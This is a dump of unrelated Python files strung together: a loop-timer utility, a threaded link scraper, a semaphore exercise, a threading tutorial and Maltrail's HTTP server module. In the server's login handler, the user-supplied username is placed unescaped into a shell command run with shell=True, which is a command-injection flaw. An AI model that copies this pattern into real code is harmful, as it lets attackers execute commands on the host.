NotImplementedError @staticmethod def store(): """ Stores a value at the specified index of the array. Returns the value.""" raise NotImplementedError @staticmethod def sub(): """ Subtracts a value at the specified index of the array. Returns the old value at that index.""" raise NotImplementedError @staticmethod def wait(): """ Verifies that the specified index of the array still contains a value and sleeps awaiting or times out. Returns either "ok", "not-equal", or "timed-out". If waiting is not allowed in the calling agent then it throws an Error exception. (Most browsers will not allow wait() on the browser's main thread.)""" raise NotImplementedError @staticmethod def xor(): """ Computes a bitwise XOR on the value at the specified index of the array with the provided value. Returns the old value at that index.""" raise NotImplementedError ''' # debugger Stops the execution of JavaScript, and calls (if available) the debugging function Statements
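# Illustrative sketch, not part of the original shim: the commented-out Atomics
# docstring above describes futex-style wait()/notify() blocking. A rough Python
# analogue of that pattern uses threading.Condition; all names below are assumptions.
import threading as _threading

_cell_cond = _threading.Condition()
_cell = {"value": 0}

def _wait_while_equal(expected):
    """Block until the shared value differs from `expected` (cf. Atomics.wait())."""
    with _cell_cond:
        _cell_cond.wait_for(lambda: _cell["value"] != expected)

def _store_and_notify(new_value):
    """Update the shared value and wake all waiters (cf. Atomics.notify())."""
    with _cell_cond:
        _cell["value"] = new_value
        _cell_cond.notify_all()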
Loopimer.py
import threading import time import datetime as dt from threading import Semaphore,Timer import queue import math import sys import os class loopi: def __init__(self,**kwargs): self.__kwargs=kwargs def _nslice(s, n, truncate=False, reverse=False): """Splits s into n-sized chunks, optionally reversing the chunks.""" assert n > 0 while len(s) >= n: if reverse: yield s[:n][::-1] else: yield s[:n] s = s[n:] if len(s) and not truncate: yield (s) self._loop=False self.print_it=False self._start_time=0 self._input=[0] if(('target' in self.__kwargs) and (self.__kwargs['target'] is not None)): if(('n_splits' in self.__kwargs) and (self.__kwargs['n_splits'] is not None)): self._input=_nslice(self.__kwargs['target'],self.__kwargs['n_splits']) else: self._input=[0] self.sequence = queue.Queue() self._joined=True self._minutes=0 self._seconds=0 self._hours=0 self._total_seconds=0 self._timedelta=dt.timedelta(hours=0,minutes=0,seconds=0,milliseconds=0 ,microseconds=0) self._strftime=0 self._activeEvent=False self._lock = threading.Lock() self._timerEnd=threading.Event() self._killit=threading.Event() self._keep_alive=False self._target_function=None self.pause=0 self._kwargs=None self._timer_thread=None self._running_thread=None self.counter=0 self.start_time=0 self.now=0 self.elapsed=dt.timedelta(hours=0,minutes=0,seconds=0,milliseconds=0 ,microseconds=0) self.total_seconds=0 self._output=None self._parent=None #put slices in queue for item in self._input: self.sequence.put(item) if(not any([key in self.__dict__ for key in self.__kwargs.keys()])): self.__dict__.update(kwargs) else: raise ValueError('naming conflict detected', [ key for key in kwargs.keys() if(key in self.__dict__)]) def apply_to(self,function,**kwargs): self._target_function=function self._kwargs=kwargs def s_print(self,*a, **b): with (self._lock): print(*a, **b,end="\r") def _trigger(self,): self._timerEnd.clear() while (not self.sequence.empty()): if(not self._loop): self._loop=False self._timerEnd.set() break else: time.sleep(1) td=dt.datetime.now()-self._start_time self._timedelta=td self._hours, remainder = divmod(td.seconds, 3600) self._minutes, self._seconds = divmod(remainder, 60) self._total_seconds=td.total_seconds() self._strftime="{:0>2}:{:0>2}:{:0>2}".format(int(self._hours),int(self._minutes),int(self._seconds)) if (self.print_it): self.s_print(self._strftime) if (self.print_it): self.s_print('\r') self._loop=False self._timerEnd.set() def _start(self,print_it=False): if(not self._loop): self.print_it=print_it self._start_time=dt.datetime.now() main_trigger=threading.Thread(target=self._trigger) main_trigger.setDaemon(True) self._loop=True self._timer_thread=main_trigger main_trigger.start() def stop(self,): self._loop=False def get(self,): return(self.sequence.get()) def kill(self,): while (self._keep_alive): self._keep_alive=False if(self._loop): self._loop=False def _eventTrigger(self,total_seconds): while (not self.sequence.empty()): if(self._total_seconds>=total_seconds): # self.s_print('triggered',self._loop) self.stop() break def addTimeEvent(self,total_seconds=None): event_trigger=threading.Thread(target=self._eventTrigger,args=(total_seconds,)) event_trigger.setDaemon(True) event_trigger.start() def _simpleloopTrigger(self,every): while (not self.sequence.empty()): if(not self._keep_alive): break else: time.sleep(every) if(self._target_function and self._keep_alive): self._target_function(self,**self._kwargs) else: break def _loop_timer(self,): while (not self.sequence.empty()): if(not self._keep_alive): break 
else: if(self._target_function and self._keep_alive): self.now=dt.datetime.now() self.elapsed=self.now-self.start_time self.total_seconds=self.elapsed.total_seconds() else: break def startSimpleLoop(self,every=None): loop_trigger=threading.Thread(target=self._simpleloopTrigger,args=(every,)) loop_trigger.setDaemon(True) self._keep_alive=True self._running_thread=loop_trigger loop_trigger.start() def _timedloopTrigger(self,): while (not self.sequence.empty()): every=self.every if(self._output): self._parent._output=self._output self.kill() if(not self._keep_alive): break else: time.sleep(every) if(self.pause>0): # self.s_print("Process suspended for ", self.pause," seconds") self._start(True) time.sleep(self.pause) self.pause=0 self.stop() self._timerEnd.wait() if(self._target_function and self._keep_alive): if(self.pause>0 and not self._timerEnd.isSet()): continue elif(self.pause==0): self.counter=self.counter+1 self._output=self._target_function(self,**self._kwargs) else: break def startTimedLoop(self,parent,every=0): loop_trigger=threading.Thread(name='loopimer_main',target=self._timedloopTrigger,args=()) loop_trigger.setDaemon(True) loop_timer_trigger=threading.Thread(name='loopimer_timer',target=self._loop_timer,args=()) loop_timer_trigger.setDaemon(True) self._keep_alive=True self.counter=0 self._running_thread=loop_trigger self.start_time=dt.datetime.now() self._parent=parent loop_trigger.start() loop_timer_trigger.start() if(self._joined): loop_trigger.join() class loopimer: def __init__(self, *args,**kwargs): self.kwargs=kwargs self.ltimer=None self._output=None self._joined=True def __call__(self, func): def wrapper(*args,**kwargs): if('joined' in self.kwargs): self._joined=self.kwargs['joined'] self.kwargs.pop('joined') self.ltimer=loopi(**self.kwargs) self.ltimer._joined=self._joined self.ltimer.apply_to(func,**kwargs) self.ltimer.startTimedLoop(self,self.kwargs['every']) return(self._output) return wrapper
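# Hedged usage sketch, not part of the original module: inferred from the code above,
# the decorated function receives the running `loopi` instance as its first argument
# and drains the sliced `target` via get(); `every` (seconds), `n_splits` and `joined`
# come from the decorator kwargs. Names and values here are illustrative only.
if __name__ == "__main__":
    @loopimer(target=list(range(20)), n_splits=5, every=1, joined=True)
    def consume(timer, label="demo"):
        chunk = timer.get()   # next 5-element slice of `target`
        print(label, "iteration", timer.counter, "->", chunk)
        return chunk

    consume(label="demo")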
crawlin.py
from threading import Thread
import requests
from requests.auth import HTTPBasicAuth
import time
import re


def craw(crawlin):
    global result
    global count
    print('crawling {} \n'.format(crawlin), end='')
    res = browser.get(crawlin)
    ret = re.findall('<a rel="nofollow" target="_blank" href=".*</a>', res.text)
    for site in ret:
        site = site.split('"')
        site = site[5]
        site = site.replace("http://", "")
        result.append(site)
    count += 1
    print("done {} \n".format(count), end='')


url = input("enter link: ")
browser = requests.Session()
pages = int(input("enter number of pages: "))
result = []


def read(result):
    f = open("sites.txt", "r")
    for line in f:
        result.append(line)
    f.close()


def write(result):
    f = open("sites.txt", "w")
    for line in result:
        f.write(line + "\n")
    f.close()


count = 0
for i in range(0, pages):
    # args must be a tuple; the original set literal with a missing "+" was a syntax error
    Thread(target=craw, args=(url + "?page=" + str(i + 1),)).start()
while count != pages:
    time.sleep(2)
write(result)
print("All done")
main.py
# This solution is somewhat close to the one presented in the book,
# but the pusher and smoker responsibilities are united in a single worker.
from threading import Semaphore, Lock, Thread

io = Lock()
agent = Semaphore(1)
tobacco = Semaphore(0)
paper = Semaphore(0)
match = Semaphore(0)


def agent_a():
    while True:
        agent.acquire()
        with io:
            print('agent_a')
        tobacco.release()
        paper.release()


def agent_b():
    while True:
        agent.acquire()
        with io:
            print('agent_b')
        paper.release()
        match.release()


def agent_c():
    while True:
        agent.acquire()
        with io:
            print('agent_c')
        tobacco.release()
        match.release()


lock = Semaphore(1)
available = set()
turnstile = Semaphore(0)


def smoker_a():
    while True:
        tobacco.acquire()
        lock.acquire()
        available.add('tobacco')
        if len(available) == 2:
            turnstile.release()
            turnstile.release()
        lock.release()
        turnstile.acquire()
        if available == {'tobacco', 'paper'}:
            with io:
                print('smoker_a')
            available.clear()
            agent.release()


def smoker_b():
    while True:
        paper.acquire()
        lock.acquire()
        available.add('paper')
        if len(available) == 2:
            turnstile.release()
            turnstile.release()
        lock.release()
        turnstile.acquire()
        if available == {'paper', 'match'}:
            with io:
                print('smoker_b')
            available.clear()
            agent.release()


def smoker_c():
    while True:
        match.acquire()
        lock.acquire()
        available.add('match')
        if len(available) == 2:
            turnstile.release()
            turnstile.release()
        lock.release()
        turnstile.acquire()
        if available == {'tobacco', 'match'}:
            with io:
                print('smoker_c')
            available.clear()
            agent.release()


threads = [Thread(target=f) for f in
           [agent_a, agent_b, agent_c, smoker_a, smoker_b, smoker_c]]
for thread in threads:
    thread.start()
for thread in threads:
    thread.join()
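# For contrast, a rough sketch of the separate "pusher" role from the book's solution
# that the header comment refers to (commented out, not wired into the demo above;
# names and structure are assumptions, not the book's verbatim code). Each pusher
# consumes one ingredient signal and either wakes the smoker who already holds the
# third ingredient or records what is on the table for the next pusher.
#
# pusher_lock = Lock()
# is_tobacco = is_paper = is_match = False
# smoker_with_match = Semaphore(0)    # needs tobacco + paper
# smoker_with_tobacco = Semaphore(0)  # needs paper + match
# smoker_with_paper = Semaphore(0)    # needs tobacco + match
#
# def pusher_tobacco():
#     global is_tobacco, is_paper, is_match
#     while True:
#         tobacco.acquire()
#         with pusher_lock:
#             if is_paper:
#                 is_paper = False
#                 smoker_with_match.release()
#             elif is_match:
#                 is_match = False
#                 smoker_with_paper.release()
#             else:
#                 is_tobacco = True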
httpd.py
#!/usr/bin/env python """ Copyright (c) 2014-2020 Maltrail developers (https://github.com/stamparm/maltrail/) See the file 'LICENSE' for copying permission """ from __future__ import print_function import datetime import glob import gzip import hashlib import io import json import mimetypes import os import re import socket import subprocess import threading import time import traceback from core.addr import addr_to_int from core.addr import int_to_addr from core.addr import make_mask from core.attribdict import AttribDict from core.common import get_regex from core.common import ipcat_lookup from core.common import worst_asns from core.compat import xrange from core.enums import HTTP_HEADER from core.settings import config from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS from core.settings import DATE_FORMAT from core.settings import DISABLED_CONTENT_EXTENSIONS from core.settings import DISPOSED_NONCES from core.settings import HTML_DIR from core.settings import HTTP_TIME_FORMAT from core.settings import IS_WIN from core.settings import MAX_NOFILE from core.settings import NAME from core.settings import PING_RESPONSE from core.settings import SERVER_HEADER from core.settings import SESSION_COOKIE_NAME from core.settings import SESSION_COOKIE_FLAG_SAMESITE from core.settings import SESSION_EXPIRATION_HOURS from core.settings import SESSION_ID_LENGTH from core.settings import SESSIONS from core.settings import UNAUTHORIZED_SLEEP_TIME from core.settings import UNICODE_ENCODING from core.settings import VERSION from thirdparty import six from thirdparty.six.moves import BaseHTTPServer as _BaseHTTPServer from thirdparty.six.moves import http_client as _http_client from thirdparty.six.moves import socketserver as _socketserver from thirdparty.six.moves import urllib as _urllib try: # Reference: https://bugs.python.org/issue7980 # Reference: http://code-trick.com/python-bug-attribute-error-_strptime/ import _strptime except ImportError: pass try: import resource resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE)) except: pass def start_httpd(address=None, port=None, join=False, pem=None): """ Starts HTTP server """ class ThreadingServer(_socketserver.ThreadingMixIn, _BaseHTTPServer.HTTPServer): def server_bind(self): self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) _BaseHTTPServer.HTTPServer.server_bind(self) def finish_request(self, *args, **kwargs): try: _BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs) except: if config.SHOW_DEBUG: traceback.print_exc() class SSLThreadingServer(ThreadingServer): def __init__(self, server_address, pem, HandlerClass): import OpenSSL # python-openssl ThreadingServer.__init__(self, server_address, HandlerClass) ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_2_METHOD) ctx.use_privatekey_file(pem) ctx.use_certificate_file(pem) self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type)) self.server_bind() self.server_activate() def shutdown_request(self, request): try: request.shutdown() except: pass class ReqHandler(_BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(self): path, query = self.path.split('?', 1) if '?' 
in self.path else (self.path, "") params = {} content = None skip = False if hasattr(self, "data"): params.update(_urllib.parse.parse_qs(self.data)) if query: params.update(_urllib.parse.parse_qs(query)) for key in params: if params[key]: params[key] = params[key][-1] if path == '/': path = "index.html" path = path.strip('/') extension = os.path.splitext(path)[-1].lower() if hasattr(self, "_%s" % path): content = getattr(self, "_%s" % path)(params) else: path = path.replace('/', os.path.sep) path = os.path.abspath(os.path.join(HTML_DIR, path)).strip() if not os.path.isfile(path) and os.path.isfile("%s.html" % path): path = "%s.html" % path if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js": content = open(path, "rb").read() content = re.sub(r"\bvar IP_ALIASES =.+", "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES), content) self.send_response(_http_client.OK) elif ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS): mtime = time.gmtime(os.path.getmtime(path)) if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE) if if_modified_since and extension not in (".htm", ".html"): if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0] if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)): self.send_response(_http_client.NOT_MODIFIED) self.send_header(HTTP_HEADER.CONNECTION, "close") skip = True if not skip: content = open(path, "rb").read() last_modified = time.strftime(HTTP_TIME_FORMAT, mtime) self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream") self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified) # For CSP policy directives see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/ self.send_header(HTTP_HEADER.CONTENT_SECURITY_POLICY, "default-src 'self'; style-src 'self' 'unsafe-inline'; img-src *; " + "script-src 'self' 'unsafe-eval' https://stat.ripe.net; " + "frame-src *; object-src 'none'; block-all-mixed-content;") if extension not in (".htm", ".html"): self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT") # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/ self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate") # Reference: http://stackoverflow.com/a/5084555 else: self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache") else: self.send_response(_http_client.NOT_FOUND) self.send_header(HTTP_HEADER.CONNECTION, "close") content = b'<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0] if content is not None: if isinstance(content, six.text_type): content = content.encode(UNICODE_ENCODING) for match in re.finditer(b"<\\!(\\w+)\\!>", content): name = match.group(1).decode(UNICODE_ENCODING) _ = getattr(self, "_%s" % name.lower(), None) if _: content = self._format(content, **{ name: _() }) if "gzip" in self.headers.get(HTTP_HEADER.ACCEPT_ENCODING): self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip") _ = six.BytesIO() compress = gzip.GzipFile("", "w+b", 9, _) compress._stream = _ 
compress.write(content) compress.flush() compress.close() content = compress._stream.getvalue() self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content))) self.end_headers() try: if content: self.wfile.write(content) self.wfile.flush() except: pass def do_POST(self): length = self.headers.get(HTTP_HEADER.CONTENT_LENGTH) data = self.rfile.read(int(length)).decode(UNICODE_ENCODING) data = _urllib.parse.unquote_plus(data) self.data = data self.do_GET() def get_session(self): retval = None cookie = self.headers.get(HTTP_HEADER.COOKIE) if cookie: match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie) if match: session = match.group(1) if session in SESSIONS: if SESSIONS[session].client_ip != self.client_address[0]: pass elif SESSIONS[session].expiration > time.time(): retval = SESSIONS[session] else: del SESSIONS[session] if retval is None and not config.USERS: retval = AttribDict({"username": "?"}) return retval def delete_session(self): cookie = self.headers.get(HTTP_HEADER.COOKIE) if cookie: match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie) if match: session = match.group(1) if session in SESSIONS: del SESSIONS[session] def version_string(self): return SERVER_HEADER def end_headers(self): if not hasattr(self, "_headers_ended"): _BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self) self._headers_ended = True def log_message(self, format, *args): return def finish(self): try: _BaseHTTPServer.BaseHTTPRequestHandler.finish(self) except: if config.SHOW_DEBUG: traceback.print_exc() def _version(self): return VERSION def _logo(self): if config.HEADER_LOGO: retval = config.HEADER_LOGO else: retval = '<img src="images/mlogo.png" style="width: 25px">altrail' return retval def _format(self, content, **params): if content: for key, value in params.items(): content = content.replace(b"<!%s!>" % key.encode(UNICODE_ENCODING), value.encode(UNICODE_ENCODING)) return content def _login(self, params): valid = False if params.get("username") and params.get("hash") and params.get("nonce"): if params.get("nonce") not in DISPOSED_NONCES: DISPOSED_NONCES.add(params.get("nonce")) for entry in (config.USERS or []): entry = re.sub(r"\s", "", entry) username, stored_hash, uid, netfilter = entry.split(':') try: uid = int(uid) except ValueError: uid = None if username == params.get("username"): try: if params.get("hash") == hashlib.sha256((stored_hash.strip() + params.get("nonce")).encode(UNICODE_ENCODING)).hexdigest(): valid = True break except: if config.SHOW_DEBUG: traceback.print_exc() if valid: _ = os.urandom(SESSION_ID_LENGTH) session_id = _.hex() if hasattr(_, "hex") else _.encode("hex") expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") cookie = "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration))) if config.USE_SSL: cookie += "; Secure" if SESSION_COOKIE_FLAG_SAMESITE: cookie += "; SameSite=strict" self.send_header(HTTP_HEADER.SET_COOKIE, cookie) if netfilter in ("", '*', "::", "0.0.0.0/0"): netfilters = None else: addresses = set() netmasks = set() for item in set(re.split(r"[;,]", netfilter)): item = item.strip() if '/' in item: _ = item.split('/')[-1] if _.isdigit() and int(_) >= 16: lower = addr_to_int(item.split('/')[0]) mask = make_mask(int(_)) upper = lower | (0xffffffff ^ mask) while lower <= upper: addresses.add(int_to_addr(lower)) lower += 1 else: netmasks.add(item) elif '-' in item: _ = 
item.split('-') lower, upper = addr_to_int(_[0]), addr_to_int(_[1]) while lower <= upper: addresses.add(int_to_addr(lower)) lower += 1 elif re.search(r"\d+\.\d+\.\d+\.\d+", item): addresses.add(item) netfilters = netmasks if addresses: netfilters.add(get_regex(addresses)) SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "mask_custom": config.ENABLE_MASK_CUSTOM and uid >= 1000, "expiration": expiration, "client_ip": self.client_address[0]}) else: time.sleep(UNAUTHORIZED_SLEEP_TIME) self.send_response(_http_client.UNAUTHORIZED) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") content = "Login %s" % ("success" if valid else "failed") if not IS_WIN: try: subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True) except Exception: if config.SHOW_DEBUG: traceback.print_exc() return content def _logout(self, params): self.delete_session() self.send_response(_http_client.FOUND) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.LOCATION, "/") def _whoami(self, params): session = self.get_session() username = session.username if session else "" self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") return username def _check_ip(self, params): session = self.get_session() if session is None: self.send_response(_http_client.UNAUTHORIZED) self.send_header(HTTP_HEADER.CONNECTION, "close") return None self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") try: result_worst = worst_asns(params.get("address")) if result_worst: result_ipcat = result_worst else: _ = (ipcat_lookup(params.get("address")) or "").lower().split(' ') result_ipcat = _[1] if _[0] == 'the' else _[0] return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()}) except: if config.SHOW_DEBUG: traceback.print_exc() def _trails(self, params): self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") return open(config.TRAILS_FILE, "rb").read() def _ping(self, params): self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") return PING_RESPONSE def _events(self, params): session = self.get_session() if session is None: self.send_response(_http_client.UNAUTHORIZED) self.send_header(HTTP_HEADER.CONNECTION, "close") return None start, end, size, total = None, None, -1, None content = None log_exists = False dates = params.get("date", "") if ".." in dates: pass elif '_' not in dates: try: date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d") event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date) if os.path.exists(event_log_path): range_handle = open(event_log_path, "rb") log_exists = True except ValueError: print("[!] 
invalid date format in request") log_exists = False else: logs_data = "" date_interval = dates.split("_", 1) try: start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date() end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date() for i in xrange(int((end_date - start_date).days) + 1): date = start_date + datetime.timedelta(i) event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d")) if os.path.exists(event_log_path): log_handle = open(event_log_path, "rb") logs_data += log_handle.read() log_handle.close() range_handle = io.BytesIO(logs_data) log_exists = True except ValueError: print("[!] invalid date format in request") log_exists = False if log_exists: range_handle.seek(0, 2) total = range_handle.tell() range_handle.seek(0) if self.headers.get(HTTP_HEADER.RANGE): match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE]) if match: start, end = int(match.group(1)), int(match.group(2)) max_size = end - start + 1 end = min(total - 1, end) size = end - start + 1 if start == 0 or not session.range_handle: session.range_handle = range_handle if session.netfilters is None and not session.mask_custom: session.range_handle.seek(start) self.send_response(_http_client.PARTIAL_CONTENT) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total)) content = session.range_handle.read(size) else: self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") buffer, addresses, netmasks, regex = io.StringIO(), set(), [], "" for netfilter in session.netfilters or []: if not netfilter: continue if '/' in netfilter: netmasks.append(netfilter) elif re.search(r"\A[\d.]+\Z", netfilter): addresses.add(netfilter) elif "\\." in netfilter: regex = r"\b(%s)\b" % netfilter else: print("[!] invalid network filter '%s'" % netfilter) return for line in session.range_handle: display = session.netfilters is None ip = None line = line.decode(UNICODE_ENCODING, "ignore") if regex: match = re.search(regex, line) if match: ip = match.group(1) display = True if not display and (addresses or netmasks): for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line): if not display: ip = match.group(1) else: break if ip in addresses: display = True break elif netmasks: for _ in netmasks: prefix, mask = _.split('/') if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix): addresses.add(ip) display = True break if session.mask_custom and "(custom)" in line: line = re.sub(r'("[^"]+"|[^ ]+) \(custom\)', "- (custom)", line) if display: if ",%s" % ip in line or "%s," % ip in line: line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? 
" % re.escape(ip), " %s " % ip, line) buffer.write(line) if buffer.tell() >= max_size: break content = buffer.getvalue() end = start + len(content) - 1 self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size))) if len(content) < max_size: session.range_handle.close() session.range_handle = None if size == -1: self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain") self.end_headers() with range_handle as f: while True: data = f.read(io.DEFAULT_BUFFER_SIZE) if not data: break else: self.wfile.write(data) else: self.send_response(_http_client.OK) # instead of _http_client.NO_CONTENT (compatibility reasons) self.send_header(HTTP_HEADER.CONNECTION, "close") if self.headers.get(HTTP_HEADER.RANGE): self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0") return content def _counts(self, params): counts = {} session = self.get_session() if session is None: self.send_response(_http_client.UNAUTHORIZED) self.send_header(HTTP_HEADER.CONNECTION, "close") return None self.send_response(_http_client.OK) self.send_header(HTTP_HEADER.CONNECTION, "close") self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json") match = re.search(r"\d+\-\d+\-\d+", params.get("from", "")) if match: min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT) else: min_ = datetime.datetime.fromtimestamp(0) match = re.search(r"\d+\-\d+\-\d+", params.get("to", "")) if match: max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT) else: max_ = datetime.datetime.now() min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0) max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999) for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))): filename = os.path.basename(filepath) if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename): continue try: current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT) except: if config.SHOW_DEBUG: traceback.print_exc() else: if min_ <= current <= max_: timestamp = int(time.mktime(current.timetuple())) size = os.path.getsize(filepath) with open(filepath, "rb") as f: content = f.read(io.DEFAULT_BUFFER_SIZE) if size >= io.DEFAULT_BUFFER_SIZE: total = 1.0 * content.count(b'\n') * size / io.DEFAULT_BUFFER_SIZE counts[timestamp] = int(round(total / 100) * 100) else: counts[timestamp] = content.count(b'\n') return json.dumps(counts) class SSLReqHandler(ReqHandler): def setup(self): self.connection = self.request self.rfile = socket._fileobject(self.request, "rb", self.rbufsize) self.wfile = socket._fileobject(self.request, "wb", self.wbufsize) # IPv6 support if ':' in (address or ""): address = address.strip("[]") _BaseHTTPServer.HTTPServer.address_family = socket.AF_INET6 # Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py _AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0) _NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV _address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4] else: _address = (address or '', int(port) if str(port or "").isdigit() else 0) try: if pem: server = SSLThreadingServer(_address, pem, SSLReqHandler) else: server = ThreadingServer(_address, ReqHandler) except Exception as ex: if "Address already in use" in str(ex): exit("[!] another instance already running") elif "Name or service not known" in str(ex): exit("[!] 
invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS) elif "Cannot assign requested address" in str(ex): exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS) else: raise print("[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1])) print("[o] running...") if join: server.serve_forever() else: thread = threading.Thread(target=server.serve_forever) thread.daemon = True thread.start()
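# Hedged usage note (illustrative only; the address/port values below are assumptions
# and the project wires this function up elsewhere): start_httpd() binds the threading
# server and either blocks in serve_forever() when join=True or serves from a daemon
# thread when join=False.
#
# start_httpd(address="127.0.0.1", port=8338, join=True, pem=None)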
Multi_Thread.py
# A thread is a unit of execution supported directly by the operating system.
# Python threads are real POSIX threads, not simulated ones.
# The Python standard library provides two modules: _thread and threading.
# _thread is the low-level module; threading is the high-level module that wraps _thread.
# Starting a thread means passing a function in to create a Thread instance,
# then calling start() to begin execution.
import time, threading

# code executed by the new thread
def loop():
    print('thread %s is running...' % threading.current_thread().name)
    n = 0
    while n < 5:
        n = n + 1
        print('thread %s >>> %s' % (threading.current_thread().name, n))
        time.sleep(1)
    print('thread %s ended.' % threading.current_thread().name)

print('thread %s is running...' % threading.current_thread().name)
t = threading.Thread(target=loop, name='LoopThread')
t.start()
t.join()
print('thread %s ended.' % threading.current_thread().name)
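# A small follow-on sketch (added, not in the original): the same pattern also passes
# positional arguments to the target function through the `args` tuple.
def count_to(limit):
    for n in range(1, limit + 1):
        print('thread %s >>> %s' % (threading.current_thread().name, n))
        time.sleep(1)

t2 = threading.Thread(target=count_to, args=(3,), name='ArgThread')
t2.start()
t2.join()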
dataset_test.py
